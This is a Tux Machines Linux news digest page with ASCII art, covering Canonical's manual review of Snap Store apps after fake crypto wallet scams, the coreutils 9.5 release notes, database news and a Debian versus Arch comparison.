⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⠟⣡⣾⣿⣿⠀⠀⠀⣸⣿⣿⣦⡙⣿⣿⡇⠀⣰⣿⡏⠀⠀⠈⣿⡿⢿⣿⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣤⡀⠀⠀⠀⠀⠀⠀⢸⣿⡟⣼⠿⠿⢿⣿⠓⠒⠚⣿⣿⣿⣿⣷⠸⣿⡇⣰⣿⡿⠷⣤⣤⣾⣿⠀⠀⣽⣿⣿⣿⣿⣶⣦⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡆⠀⢀⣤⣾⣿⣈⣼⠿⠆⠀⠀⠀⠀⠀⢸⣿⠃⡇⠀⠀⠈⣿⠀⠀⠀⣿⣏⣯⣿⣿⡇⣿⣰⣿⡏⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠐⠁⠀⠉⢹⡏⠀⠀⠀⢠⠀⠀⠀⠀⢸⣿⣇⢳⣦⣤⣾⣿⣄⣀⣠⣿⣿⣿⣿⣿⠁⣱⣿⡿⠿⣤⣤⣶⣿⠀⠀⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠈⢀⣄⣀⣼⡿⢄⣀⣠⣦⡇⠀⠀⠀⠀⠈⢿⣌⠻⣿⣿⣿⠁⠀⠈⢻⣿⣿⠟⢁⢀⣿⡏⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠀⠉⠁⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠻⣧⣄⠈⠋⠀⠀⠀⠊⠉⣁⣴⢾⣾⣿⣿⣤⣀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠷⠶⠶⠶⠶⠟⠋⠁⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠉⠉⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠿⠿⠿⠯⠿⠿⠿⠸⠿⠋⠻⠟⠏⠃⠁⠀⠀ ⣿⠿⠿⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ䷩ 𝚕𝚒𝚗𝚎 982 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Canonical_to_manually_approve_new_Snap_package_names.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Canonical_to_manually_approve_new_Snap_package_names.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Canonical to manually approve new Snap package names⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024, updated Mar 29, 2024 Part of the problem is that these apps look legitimate to casual inspection because the Snap Store badges them as "safe." Unfortunately, that just means the apps are strictly confined in a sandbox, but for the scammers' purposes, that doesn't matter. The apps look like the real thing and use simple social engineering to extract users' credentials, which they then use to siphon off the victim's funds. But the apps can't touch your system, so by Snap confinement rules, they're "safe." Read_on Two More: * ⚓ Ubuntu_will_manually_review_Snap_Store_after_crypto_wallet_scams⠀⇛ The Snap Store, where containerized Snap apps are distributed for Ubuntu's Linux distribution, has been attacked for months by fake crypto wallet uploads that seek to steal users' currencies. As a result, engineers at Ubuntu's parent firm are now manually reviewing apps uploaded to the store before they are available. The move follows weeks of reporting by Alan Pope, a former Canonical/Ubuntu staffer on the Snapcraft team, who is still very active in the ecosystem. In February, Pope blogged about how one bitcoin investor lost nine bitcoins (about $490,000 at the time) by using an "Exodus Wallet" app from the Snap store. Exodus is a known cryptocurrency wallet, but this wallet was not from that entity. As detailed by one user wondering what happened on the Snapcraft forums, the wallet immediately transferred his entire balance to an unknown address after a 12-word recovery phrase was entered (which Exodus tells you on support pages never to do). * ⚓ Oh_Snap!_Canonical_now_doing_manual_reviews_for_new_packages_due_to scam_apps⠀⇛ After repeatedly suffering issues with scam apps making it onto the Snap Store, Canonical maker of Ubuntu Linux have now decided to manually look over submissions. I've covered the issues with the Snap Store a few times now like on March 19th when ten scam crypto apps appeared, got taken down and then reappeared under a different publisher. Also earlier back in February there was an issue where a user actually lost their wallet as a result of a fake app. Multiple fake apps were also put up back in October last year as well, so it was a repeating issue that really needed dealing with properly. ䷩ 𝚕𝚒𝚗𝚎 1058 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/coreutils_9_5_released.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/coreutils_9_5_released.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ coreutils-9.5 released⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 This is to announce coreutils-9.5, a stable release. There have been 187 commits by 18 people in the 30 weeks since 9.4. Aearil (1) Petr Malat (1) Bruno Haible (3) Pádraig Brady (75) Christian Göttsche (1) Samuel Tardieu (1) Collin Funk (4) Stephane Chazelas (1) Daan De Meyer (1) Stephen Kitt (1) Greg Wooledge (1) Sylvestre Ledru (3) Grisha Levit (2) Ville Skyttä (1) Michel Lind (1) dann frazier (1) Paul Eggert (89) lvgenggeng (1) https://gnu.org/s/coreutils/ https://git.sv.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.5 git shortlog v9.4..v9.5 https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz (15MB) https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz (5.8MB) https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz.sig https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz.sig 3285114d93b39e5e4643b0846f570203a5e4c97b coreutils-9.5.tar.gz dnrmoilQ7ELzul98Heed0ngA7o6bhkLaXe21l0oXQeU= coreutils-9.5.tar.gz 867fed7ce2ee15c5150a355a5f3a3b50578cf78d coreutils-9.5.tar.xz zTKO3qyS9qZl3p8yPJO3Eq8YWLwuDYjz9xAEaUcKG4o= coreutils-9.5.tar.xz gpg --verify coreutils-9.5.tar.gz.sig uid [ultimate] Pádraig Brady uid [ultimate] Pádraig Brady gpg --keyring gnu-keyring.gpg --verify coreutils-9.5.tar.gz.sig Gnulib v0.1-7293-g259829e78b * Noteworthy changes in release 9.5 (2024-03-28) [stable] chmod -R now avoids a race where an attacker may replace a traversed file with a symlink, causing chmod to operate on an unintended file. cp, mv, and install no longer issue spurious diagnostics like "failed to preserve ownership" when copying to GNU/Linux CIFS file systems. They do this by working around some GNU/Linux CIFS bugs. cp --no-preserve=mode will correctly maintain set-group-ID bits for created directories. Previously on systems that didn't support ACLs, cp would have reset the set-group-ID bit on created directories. [bug introduced in coreutils-8.20] join and uniq now support multi-byte characters better. For example, 'join -tX' now works even if X is a multi-byte character, and both programs now treat multi-byte characters like U+3000 IDEOGRAPHIC SPACE as blanks if the current locale treats them so. numfmt options like --suffix no longer have an arbitrary 127-byte limit. [bug introduced with numfmt in coreutils-8.21] mktemp with --suffix now better diagnoses templates with too few X's. Previously it conflated the insignificant --suffix in the error. [bug introduced in coreutils-8.1] sort again handles thousands grouping characters in single-byte locales where the grouping character is greater than CHAR_MAX. For e.g. signed character platforms with a 0xA0 (aka  ) grouping character. split --line-bytes with a mixture of very long and short lines no longer overwrites the heap (CVE-2024-0684). tail no longer mishandles input from files in /proc and /sys file systems, on systems with a page size larger than the stdio BUFSIZ. timeout avoids a narrow race condition, where it might kill arbitrary processes after a failed process fork. [bug introduced with timeout in coreutils-7.0] timeout avoids a narrow race condition, where it might fail to kill monitored processes immediately after forking them. wc no longer fails to count unprintable characters as parts of words. [bug introduced in textutils-2.1] base32 and base64 no longer require padding when decoding. Previously an error was given for non padded encoded data. base32 and base64 have improved detection of corrupted encodings. Previously encodings with non zero padding bits were accepted. basenc --base16 -d now supports lower case hexadecimal characters. Previously an error was given for lower case hex digits. cp --no-clobber, and mv -n no longer exit with failure status if existing files are encountered in the destination. Instead they revert to the behavior from before v9.2, silently skipping existing files. ls --dired now implies long format output without hyperlinks enabled, and will take precedence over previously specified formats or hyperlink mode. numfmt will accept lowercase 'k' to indicate Kilo or Kibi units on input, and uses lowercase 'k' when outputting such units in '--to=si' mode. pinky no longer tries to canonicalize the user's login location by default, rather requiring the new --lookup option to enable this often slow feature. wc no longer ignores encoding errors when counting words. Instead, it treats them as non white space. ** New features chgrp now accepts the --from=OWNER:GROUP option to restrict changes to files with matching current OWNER and/or GROUP, as already supported by chown(1). chmod adds support for -h, -H,-L,-P, and --dereference options, providing more control over symlink handling. This supports more secure handling of CLI arguments, and is more consistent with chown, and chmod on other systems. cp now accepts the --keep-directory-symlink option (like tar), to preserve and follow existing symlinks to directories in the destination. cp and mv now accept the --update=none-fail option, which is similar to the --no-clobber option, except that existing files are diagnosed, and the command exits with failure status if existing files. The -n,--no-clobber option is best avoided due to platform differences. env now accepts the -a,--argv0 option to override the zeroth argument of the command being executed. mv now accepts an --exchange option, which causes the source and destination to be exchanged. It should be combined with --no-target-directory (-T) if the destination is a directory. The exchange is atomic if source and destination are on a single file system that supports atomic exchange; --exchange is not yet supported in other situations. od now supports printing IEEE half precision floating point with -t fH, or brain 16 bit floating point with -t fB, where supported by the compiler. tail now supports following multiple processes, with repeated --pid options. cp,mv,install,cat,split now read and write a minimum of 256KiB at a time. This was previously 128KiB and increasing to 256KiB was seen to increase throughput by 10-20% when reading cached files on modern systems. env,kill,timeout now support unnamed signals. kill(1) for example now supports sending such signals, and env(1) will list them appropriately. SELinux operations in file copy operations are now more efficient, avoiding unneeded MCS/MLS label translation. sort no longer dynamically links to libcrypto unless -R is used. This decreases startup overhead in the typical case. wc is now much faster in single-byte locales and somewhat faster in multi-byte locales. Read_on ䷩ 𝚕𝚒𝚗𝚎 1299 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Databases_PostgreSQL_MySQL_and_MariaDB.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Databases_PostgreSQL_MySQL_and_MariaDB.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Databases: PostgreSQL, MySQL, and MariaDB⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 ⚓ HowTo Forge ☛ How_to_Install_PostgreSQL_and_pgAdmin_on_Ubuntu_22.04⠀⇛ PostgreSQL or Postgres is an open-source object-relational database management that implements the SQL querying language. It has advanced features like reliable transactions and concurrency without read locks, allowing us to build fault-tolerant environments and complex applications. * ⚓ HowTo Forge ☛ How_to_Install_and_Use_MySQL_8_on_Ubuntu_22.04⠀⇛ MySQL is a free, open-source, relational database management platform powered by Oracle Cloud. It is very popular due to its proven reliability, quick processing, ease and flexibility. It uses Structured Query Language to add, access, and manage a database's content. MySQL 8.0 stores its meta-data into a proven transactional storage engine called InnoDB. It works on client/server architecture and can be installed on all major operating systems, including Ubuntu, Windows, CentOS, and Debian. This tutorial will show you how to install MySQL 8 on Ubuntu 22.04 server. * ⚓ The Register UK ☛ Progress_outbids_private_equity_in_offer_for_MariaDB plc⠀⇛ The application development and infrastructure software company has confirmed it is considering a possible offer for MariaDB plc at a value of $0.60 per share, valuing the firm at around $40.6 million. The latest bid followed an offer by K5 Private Investors – a fund controlled by private equity company K1 – of $0.55 per share, equivalent to $37.3 million. In the run-up to its December 2022 IPO, the company's value was estimated at $672 million. ䷩ 𝚕𝚒𝚗𝚎 1361 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Debian_vs_Arch_Linux_Which_is_Better_for_You.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Debian_vs_Arch_Linux_Which_is_Better_for_You.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Debian vs. Arch Linux: Which is Better for You?⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇Debian_vs._Arch_Linux⦈_ Debian Vs. Arch! The age-old debate! From servers and desktops to Raspberry Pi’s and gaming consoles, these two distributions are everywhere! They are inherently different and come loaded with features that may or may not suit you! But which one should you install? Well, in this article, we’ll answer just that and help you find the distro that fits your style and your needs. [...] So which one is best for you? Debian or Arch? This entirely depends on you. The best distribution for you is the one that includes all the features and tools you desire. Choose the one that appeals to you personally and reflects your technical goals. So, if you need a rock-solid OS with years of support down the road, Debian just might be what you’re looking for. But if you’re all about customization and want your system to reflect you, then Arch Linux would be better than Debian. Hopefully, that settles the Debian vs. Arch Linux debate for you. Read_on ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠛⠿⠿⠿⠿⠿⠿⠟⠙⠛⠿⠻⠻⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣤⣤⣦⣴⣶⣶⣶⣤⣄⣈⣴⣶⣶⣶⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠿⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⣿⣾⣿⣿⣿⣿⣿⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀⠀⠈⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⠁⠀⠀⣤⠀⠀⠀⠉⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⣽⣿⡿⢿⣽⠿⠶⢾⣽⢿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⢀⣴⣦⣄⡀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⢰⣿⣇⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣫⣿⣿⣿⣷⡝⡟⣿⣿⣟⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠾⢿⣿⡿⠿⠆⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⣰⣿⣿⣿⣆⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⢿⣧⣿⡿⣿⣹⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⢠⣤⣾⣿⣤⣤⣧⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⣰⣿⡿⠉⢻⣿⣦⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⣿⡾⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠙⣿⣿⣿⣿⣿⠃⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⣰⡿⠿⠃⠀⠘⠻⢿⣤⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣓⣿⣿⣿⣿⣿⣿⣯⣾⣿⣿⣿⣿⣿⣿⣿⣿⣦⡀⠀⢿⣿⣿⣿⠃⠀⢀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣷⡄⠈⠁⠀⠀⠀⠀⠀⠀⠀⠈⠁⠀⣸⢛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣵⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢻⢳⢀⢠⣿⣿⡏⠀⠀⢸⡆⢄⠙⣿⣿⣿⣿⣿⣿⣿⣿⣶⣄⠀⠀⠀⠀⠀⠀⠀⣀⣤⣾⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⣠⣿⠇⠀⠘⣿⣿⡇⠀⢄⠈⡷⢿⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣅⢹⣿⡛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣵⡁⣴⣶⣾⣿⣿⣿⣶⣬⣿⡄⣸⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣩⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣽⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣍⣻⣿⣿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣠⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⡄⠀⢸⣿⣿⣿⣿⣿⣿⣿⠋⠀⠈⠙⢿⣿⣿⣿⣿⣿⡏⠙⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⣿⣿⣄⡀⣿⣿⣿⣿⣿⣿⡏⠔⠀⠒⠀⢸⣿⣿⣿⣿⣿⠇⣀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠈⣻⣿⣷⢸⣿⣿⣿⣿⣿⡏⠘⠿⢓⠀⠘⣿⣿⣿⣿⣿⢳⣿⣿⣿⠃⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣾⣿⣿⣿⣿⠏⠀⣸⣿⣿⣄⠀⠈⢿⣿⣿⣷⣿⣿⣿⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢩⠋⢩⡏⢍⢹⠏⢹⠉⠏⣿⣿⣿⣿⣿⣿⡏⠀⢰⣿⣿⣿⣿⡄⠀⠈⣿⣿⣿⠉⡏⠉⡛⣭⡏⠏⣿⡏⣽⠉⠙⣹⢹⢹⠙⣽⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣈⣤⣘⣇⣢⣸⣠⣌⣰⣀⣿⣿⣿⣿⣿⢟⣡⡀⠈⠻⣿⣿⡏⠀⢀⣀⢻⣿⣇⣤⣀⣀⣧⣙⣅⣇⣿⣧⣛⣠⣰⣸⣘⣼⣤⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ 